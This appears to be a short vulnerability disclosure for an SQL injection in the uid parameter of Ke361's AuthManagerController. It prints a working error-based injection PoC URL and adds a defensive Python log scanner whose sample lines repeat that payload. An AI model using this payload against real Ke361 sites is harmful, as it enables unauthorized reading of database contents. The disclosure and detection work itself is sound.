Ke361 AuthManagerController.class.php Background SQL injection vulnerability
Vulnerability Description
The uid parameter handled by Ke361's AuthManagerController.class.php is vulnerable to SQL injection, through which sensitive information in the database can be obtained.
Vulnerability Impact
Ke361
Environment setup
https://gitee.com/jcove/ke361
Vulnerability reproduction
CMS Product Page
The vulnerable file is Application/Admin/Controller/AuthManagerController.class.php
Verification PoC
/admin.php?s=/AuthManager/group/uid/1')%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
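A defender-side check for this request pattern, as an added example that is not part of the original post or the Ke361 code: it scans web access logs for calls to AuthManager/group whose uid is not a plain integer. The log format, sample lines and client addresses are constructed, and the handling of a separate uid= query parameter is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the original page); the second one
# carries the request shown in the PoC above.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin.php?s=/AuthManager/group/uid/12 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /admin.php?s=/AuthManager/group/uid/1')%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+ HTTP/1.1" 200 873
203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /admin.php?s=/Index/index HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Everything after "uid/" is kept, so a value containing "/" is not truncated.
ROUTE_UID = re.compile(r"/AuthManager/group/(?:.*?/)?uid/(.*)$", re.I | re.S)


def extract_uid(target):
    """Return the decoded uid sent to AuthManager/group, or None if absent."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    route = query.get("s", [""])[0]  # parse_qs has already URL-decoded this
    if not re.search(r"/AuthManager/group(/|$)", route, re.I):
        return None
    match = ROUTE_UID.search(route)
    if match:
        return match.group(1)
    # Assumption: uid may also arrive as an ordinary query parameter.
    return query.get("uid", [None])[0]


def suspicious_requests(log_text):
    """Return (client, uid) for requests whose uid is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        uid = extract_uid(m.group(2))
        if uid is not None and not re.fullmatch(r"\d{1,10}", uid):
            hits.append((m.group(1), uid))
    return hits


if __name__ == "__main__":
    for client, uid in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric uid: {uid!r}")
```

The same integer-only rule is what the controller should enforce on uid before the value reaches a query.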
This post is licensed under CC BY 4.0 by the author.